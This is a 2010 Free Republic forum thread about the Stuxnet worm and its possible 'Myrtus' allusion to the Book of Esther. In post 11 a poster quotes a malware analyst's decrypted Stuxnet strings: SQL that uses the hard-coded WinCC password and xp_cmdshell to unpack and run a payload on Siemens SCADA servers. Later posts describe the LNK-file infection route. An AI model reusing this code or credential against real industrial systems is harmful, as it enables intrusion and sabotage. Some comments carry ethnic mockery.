Free Republic
Browse · Search
General/Chat
Topics · Post Article

Skip to comments.

In a Computer Worm, a Possible Biblical Clue
nytimes ^ | 9/29 | By JOHN MARKOFF and DAVID E. SANGER

Posted on 09/30/2010 11:59:40 AM PDT by JoeProBono

Deep inside the computer worm that some specialists suspect is aimed at slowing Iran’s race for a nuclear weapon lies what could be a fleeting reference to the Book of Esther, the Old Testament tale in which the Jews pre-empt a Persian plot to destroy them. That use of the word “Myrtus” — which can be read as an allusion to Esther — to name a file inside the code is one of several murky clues that have emerged as computer experts try to trace the origin and purpose of the rogue Stuxnet program, which seeks out a specific kind of command module for industrial equipment.

Not surprisingly, the Israelis are not saying whether Stuxnet has any connection to the secretive cyberwar unit it has built inside Israel’s intelligence service. Nor is the Obama administration,

(Excerpt) Read more at nytimes.com ...


TOPICS: Chit/Chat; Computers/Internet; Conspiracy
KEYWORDS: 05091979; esther; habibelghanian; iran; israel; malware; myrtus; stuxnet; virus
Navigation: use the links below to view more comments.
first 1-2021-27 next last
"According to the Esther 2:7, Esther was originally named Hadassah. Hadassah means "myrtle" in Hebrew. It has been conjectured that the name Esther is derived from a reconstructed Median word astra meaning myrtle"

Ooo -Kay

1 posted on 09/30/2010 11:59:43 AM PDT by JoeProBono
[ Post Reply | Private Reply | View Replies]

To: JoeProBono
After the Nuremburg trials, as Julius Streicher was about to be hanged, he screamed out "Purimfest 1946!"

Also an allusion to the story of Esther.

People who try to wipe out the Jews do not fare well.

2 posted on 09/30/2010 12:04:57 PM PDT by ClearCase_guy (Things will change after the revolution, but not before.)
[ Post Reply | Private Reply | To 1 | View Replies]

To: JoeProBono

Not your fault, but this is like the fourth time today this thread has been started. Just so ya know.

People working overtime to blame Israel, eh?


3 posted on 09/30/2010 12:05:28 PM PDT by Blueflag (Res ipsa loquitur)
[ Post Reply | Private Reply | To 1 | View Replies]

To: JoeProBono

One of God’s angels is a Hacker?


4 posted on 09/30/2010 12:09:40 PM PDT by NavyCanDo
[ Post Reply | Private Reply | To 1 | View Replies]

To: Blueflag

Blame? Praise is a more appropriate word.


5 posted on 09/30/2010 12:10:38 PM PDT by arthurus (Read Hazlitt's "Economics In One Lesson.")
[ Post Reply | Private Reply | To 3 | View Replies]

To: JoeProBono
the Israelis are not saying whether Stuxnet has any connection to the secretive cyberwar unit it has built inside Israel’s intelligence service. Nor is the Obama administration,

You can be sure that if Osama Obama thought that Israel had anything to do with it he would be in a total uproar.
6 posted on 09/30/2010 12:13:16 PM PDT by rideharddiefast
[ Post Reply | Private Reply | To 1 | View Replies]

To: ClearCase_guy

7 posted on 09/30/2010 12:19:42 PM PDT by JoeProBono (A closed mouth gathers no feet - Visualize)
[ Post Reply | Private Reply | To 2 | View Replies]

To: arthurus

Exactly.


8 posted on 09/30/2010 12:30:36 PM PDT by Eagles6
[ Post Reply | Private Reply | To 5 | View Replies]

To: ClearCase_guy

The day of Purim that is celebrated on the Jewish calender was the day Haman and his 10 sons were hanged. It just so happens that on the same day in 1946 Hitler’s 10 closest officers were hanged after the Nuremberg trials had concluded.


9 posted on 09/30/2010 12:39:09 PM PDT by Jack Hydrazine (It's the end of the world as we know it and I feel fine!)
[ Post Reply | Private Reply | To 2 | View Replies]

To: JoeProBono

I thought they had established that the only folks with access to the affected computers were Russian.

India and Indonesia were affected by this worm as well, btw.


10 posted on 09/30/2010 12:55:00 PM PDT by Schnucki
[ Post Reply | Private Reply | To 1 | View Replies]

To: Blueflag; JoeProBono; ShadowAce; blam; SunkenCiv; Marine_Uncle
Could be other than israel...at Wired:

SCADA System’s Hard-Coded Password Circulated Online for Years

And let's include something from Wilders Security Forum:Rootkit.TmpHider

**************************************Excerpts************************************

July 12th, 2010, 09:18 AM

sergey ulasen

Modules of current malware were first time detected by "VirusBlokAda" (http://anti-virus.by/en/) company specialists on the 17th of June, 2010 and were added to the anti-virus bases as Trojan-Spy.0485 and Malware-Cryptor.Win32.Inject.gen.2. During the analysis of malware there was revealed that it uses USB storage device for propagation.

You should take into consideration that virus infects Operation System in unusual way through vulnerability in processing lnk-files (without usage of autorun.inf file).

So you just have to open infected USB storage device using Microsoft Explorer or any other file manager which can display icons (for i.e. Total Commander) to infect your Operating System and allow execution of the malware.

Malware installs two drivers: mrxnet.sys and mrxcls.sys. They are used to inject code into systems processes and hide malware itself. That's the reason why you can't see malware files on the infected USB storage device. We have added those drivers to anti-virus bases as Rootkit.TmpHider and SScope.Rookit.TmpHider.2. Note that both drivers are signed with digital signature of Realtek Semiconductor Corp. (www.realtek.com).

Thus, current malware should be added to very dangerous category causes the risk of the virus epidemic at the current moment.

After we have added a new recordes to the anti-virus bases we are admitting a lot of detections of Rootkit.TmpHider and SScope.Rookit.TmpHider.2 all over the world.



Source: http://anti-virus.by/en/tempo.shtml

__________________

**************************************************************snip************************************************

Now to a later post :

frank_boldewin

AV Expert

***************************EXCERPT*****************************

hi guys,

has anyone already taken a deeper look at the malware?

i found stuff like this after some decryption/unpacking stages of MD5 sample 016169ebebf1cec2aad6c7f0d0ee9026

**********************

SOFTWARE\Microsoft\MSSQLServer pdl GracS\ 2WSXcder WinCCConnect master .\WinCC sqloledb GracS\cc_tlg7.sav Step7\Example use [%s] declare @t varchar(4000), @e int, @f int if exists (select text from dbo.syscomments where id=object_id(N'[dbo].[MCPVREADVARPERCON]')) select @t=rtrim(text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVREADVARPERCON]') set @e=charindex(',openrowset',@t) if @e=0 set @t=right(@t,len(@t)-7) else begin set @f=charindex('sp_msforeachdb',@t) if @f=0 begin set @t=left(@t,@e-1) set @t=right(@t,len(@t)-7) end else select * from fail_in_order_to_return_false end set @t='alter '+@t+',openrowset(''SQLOLEDB'',''Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder'',''select 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''''''--CC-S''''''''+char(80);if left(db_name(),2)=''''''''CC'''''''' select @t=substring(text,charindex(@s,text)+8,charindex(''''''''--*'''''''',text)-charindex(@s,text)-8) from syscomments where text like (''''''''%''''''''+@s+''''''''%'''''''');if @t is not NULL exec(@t)'''';exec sp_msforeachdb @z'')' exec (@t) declare @t varchar(4000), @e int, @f int if exists (select * from dbo.syscomments where id=object_id(N'[dbo].[MCPVPROJECT2]')) select @t=rtrim(c.text) from dbo.syscomments c, dbo.sysobjects o where o.id = c.id and c.id = object_id(N'[dbo].[MCPVPROJECT2]') order by c.number, c.colid set @e=charindex('--CC-SP',@t) if @e=0 begin set @f=charindex('where',@t) if @f<>0 set @t=left(@t,@f-1) set @t=right(@t,len(@t)-6) end else select * from fail_in_order_to_return_false set @t='alter '+@t+' where ((SELECT top 1 1 FROM MCPVREADVARPERCON)=''1'') --CC-SP use master;declare @t varchar(999),@s varchar(999),@a int declare r cursor for select filename from master..sysdatabases where (name like ''CC%'') open r fetch next from r into @t while (@@fetch_status<>-1) begin set @t=left(@t,len(@t)-charindex(''\'',reverse(@t)))+''\GraCS\cc_tlg7.sav'';exec master..xp_fileexist @t,@a out;if @a=1 begin set @s = ''master..xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_payload,@t);exec master..sp_payload;exec master..sp_dropextendedproc sp_payload;break; end fetch next from r into @t end close r deallocate r --*' exec (@t) use master select name from master..sysdatabases where filename like N'%s' exec master..sp_attach_db 'wincc_svr',N'%s',N'%s' exec master..sp_detach_db 'wincc_svr' use wincc_svr or SOFTWARE\SIEMENS\WinCC\Setup STEP7_Version SOFTWARE\SIEMENS\STEP7 SOFTWARE\Microsoft\Windows\CurrentVersion\MS-DOS Emulation NTVDM TRACE .MCP .zip ~DT %s\WINCC DECLARE @vr varchar(256) SET @vr = CONVERT(varchar(256), (SELECT serverproperty('productversion') )) IF @vr > '9' BEGIN EXEC sp_configure 'show advanced options', 1 RECONFIGURE WITH OVERRIDE EXEC sp_configure 'Ole Automation Procedures', 1 RECONFIGURE WITH OVERRIDE END DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @aods int, @adss int, @aip int, @abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @aods, 'Type', 1 IF @hr <> 0 GOTO endq EXEC @hr = sp_OAMethod @aods, 'Open', null IF @hr <> 0 GOTO endq SET @adss = ( SELECT DATALENGTH(abin) FROM sysbinlog ) SET @aip = 1 WHILE ( @aip <= @adss ) BEGIN SET @abf = ( SELECT SUBSTRING (abin, @aip, 4096 ) FROM sysbinlog ) EXEC @hr = sp_OAMethod @aods, 'Write', null, @abf IF @hr <> 0 GOTO endq SET @aip = @aip + 4096 END EXEC @hr = sp_OAMethod @aods, 'SaveToFile', null, @ainf, 2 IF @hr <> 0 GOTO endq EXEC sp_OAMethod @aods, 'Close', null endq: EXEC sp_dropextendedproc sp_dumpdbilog DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' EXEC sp_addextendedproc sp_dumpdbilog, @ainf EXEC sp_dumpdbilog EXEC sp_dropextendedproc sp_dumpdbilog endq: DECLARE @ashl int, @aind varchar(260), @ainf varchar(260), @hr int EXEC @hr = sp_OACreate 'WScript.Shell', @ashl OUT IF @hr <> 0 GOTO endq EXEC sp_OAMethod @ashl, 'ExpandEnvironmentStrings', @aind OUT, '%%ALLUSERSPROFILE%%' SET @ainf = @aind + '\sql%05x.dbi' DECLARE @fs int EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fs OUT IF @hr <> 0 GOTO endq EXECUTE sp_OAMethod @fs, 'DeleteFile', NULL, @ainf endq: DROP TABLE sysbinlog 0123456789ABCDEF CREATE TABLE sysbinlog ( abin image ) INSERT INTO sysbinlog VALUES(0x %SystemRoot%\system32\netapi32.dll %SystemRoot%\system32\kernel32.dll .xp_cmdshell ''''extrac32 /y "''+@t+''" "''+@t+''x"'''''';exec(@s);set @t = @t+''x'';dbcc addextendedproc(sp_run,@t);exec master..sp_run;') view MCPVREADVARPERCON as select MCPTVARIABLEDESC.VARIABLEID,MCPTVARIABLEDESC.VARIABLETYPEID,MCPTVARIABLEDESC.FORMATFITTING,MCPTVARIABLEDESC.SCALEID,MCPTVARIABLEDESC.VARIABLENAME,MCPTVARIABLEDESC.ADDRESSPARAMETER,MCPTVARIABLEDESC.PROTOKOLL,MCPTVARIABLEDESC.MAXLIMIT,MCPTVARIABLEDESC.MINLIMIT,MCPTVARIABLEDESC.STARTVALUE,MCPTVARIABLEDESC.SUBSTVALUE,MCPTVARIABLEDESC.VARFLAGS,MCPTVARIABLEDESC.CONNECTIONID,MCPTVARIABLEDESC.VARPROPERTY,MCPTVARIABLEDESC.CYCLETIMEID,MCPTVARIABLEDESC.LASTCHANGE,MCPTVARIABLEDESC.ASDATASIZE,MCPTVARIABLEDESC.OSDATASIZE,MCPTVARIABLEDESC.VARGROUPID,MCPTVARIABLEDESC.VARXRES,MCPTVARIABLEDESC.VARMARK,MCPTVARIABLEDESC.SCALETYPE,MCPTVARIABLEDESC.SCALEPARAM1,MCPTVARIABLEDESC.SCALEPARAM2,MCPTVARIABLEDESC.SCALEPARAM3,MCPTVARIABLEDESC.SCALEPARAM4 from MCPTVARIABLEDESC ((SELECT top 1 1 FROM MCPVREADVARPERCON)='1') --CC-SP 0;set IMPLICIT_TRANSACTIONS off;declare @z nvarchar(999);set @z=''use [?];declare @t nvarchar(2000);declare @s nvarchar(9);set @s=''''--CC-S''''+char(80);if left(db_name(),2)=''''CC'''' select @t=substring(text,charindex(@s,text)+8,charindex(''''--*'''',text)-charindex(@s,text)-8) from syscomments where text like (''''%''''+@s+''''%'''');if @t is not NULL exec(@t)'';exec sp_msforeachdb @z')

*****************************************

this points me to the Siemens WinCC SCADA system. looks like this malware was made for espionage.

11 posted on 09/30/2010 1:12:06 PM PDT by Ernest_at_the_Beach ( Support Geert Wilders)
[ Post Reply | Private Reply | To 3 | View Replies]

To: All
From Rmus Exploit Analyst

http://www.wilderssecurity.com/showpost.php?p=1712713&postcount=26

********************************EXCERPT************************************

Re: Rootkit.TmpHider

Is this vulnerability present in all Windows Operating Systems? I cannot get shortcut links to run automatically from a USB drive in Win2K or WinXP.

12 posted on 09/30/2010 1:25:37 PM PDT by Ernest_at_the_Beach ( Support Geert Wilders)
[ Post Reply | Private Reply | To 11 | View Replies]

To: All
And :

i_g Regular Poster

******************************EXCERPT*****************************

Re: Rootkit.TmpHider


Quote:
Originally Posted by Rmus
Is this vulnerability present in all Windows Operating Systems? I cannot get shortcut links to run automatically from a USB drive in Win2K or WinXP.

Yes, it is.
Well, didn't try on Win2k, but it works on XP, Vista, Win7.

13 posted on 09/30/2010 1:29:07 PM PDT by Ernest_at_the_Beach ( Support Geert Wilders)
[ Post Reply | Private Reply | To 12 | View Replies]

To: Jack Hydrazine

Thank you for that historical tidbit. Ironic. May the same fate befall anyone else who seeks to annihilate the Jews or commit any sort of genocide.


14 posted on 09/30/2010 1:30:09 PM PDT by Bigg Red (Palin/Hunter 2012 -- Bolton their Secretary of State)
[ Post Reply | Private Reply | To 9 | View Replies]

To: JoeProBono; Blueflag

NY Times has a vested interest in blaming the Joooos....


15 posted on 09/30/2010 1:35:15 PM PDT by Ernest_at_the_Beach ( Support Geert Wilders)
[ Post Reply | Private Reply | To 1 | View Replies]

To: Jack Hydrazine
...It just so happens that on the same day in 1946 Hitler’s 10 closest officers were hanged...

LOL

16 posted on 09/30/2010 1:45:03 PM PDT by Talisker (When you find a turtle on top of a fence post, you can be damn sure it didn't get there on it's own.)
[ Post Reply | Private Reply | To 9 | View Replies]

To: Ernest_at_the_Beach
More on the Root Kit :

RootkitTmpHider-USB-infector-without-usage-of-Autoruninf

17 posted on 09/30/2010 1:46:57 PM PDT by Ernest_at_the_Beach ( Support Geert Wilders)
[ Post Reply | Private Reply | To 15 | View Replies]

EXCERPT From #17:

********************************EXCERPT*************************************

Rootkit-TmpHider - USB infector without usage of Autorun.inf

»anti-virus.by/en/tempo.shtml

Also they are talking about this at Wilders in some depth.

»www.wilderssecurity.com/showthre···t=276994

This malware appears to be exploiting an unpatched vulnerability in processing LNK files.

It looks like this malware could infect even if you have 'Autorun' disabled on your computer. Simply accessing the infected USB device with Windows Explorer or another file manager could execute this malware.

18 posted on 09/30/2010 1:49:13 PM PDT by Ernest_at_the_Beach ( Support Geert Wilders)
[ Post Reply | Private Reply | To 17 | View Replies]

To: Talisker

What’s so funny? I must be missing something in the text you put in bold.


19 posted on 09/30/2010 2:36:01 PM PDT by Jack Hydrazine (It's the end of the world as we know it and I feel fine!)
[ Post Reply | Private Reply | To 16 | View Replies]

To: Ernest_at_the_Beach; blam; Perdogg; martin_fierro; Swordmaker; Quix
use of the word "Myrtus" -- which can be read as an allusion to Esther -- to name a file inside the code is one of several murky clues
Turn me on, dead man. ;')


20 posted on 09/30/2010 6:31:24 PM PDT by SunkenCiv (Democratic Underground... matters are worse, as their latest fund drive has come up short...)
[ Post Reply | Private Reply | To 11 | View Replies]


Navigation: use the links below to view more comments.
first 1-2021-27 next last

Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.

Free Republic
Browse · Search
General/Chat
Topics · Post Article

FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson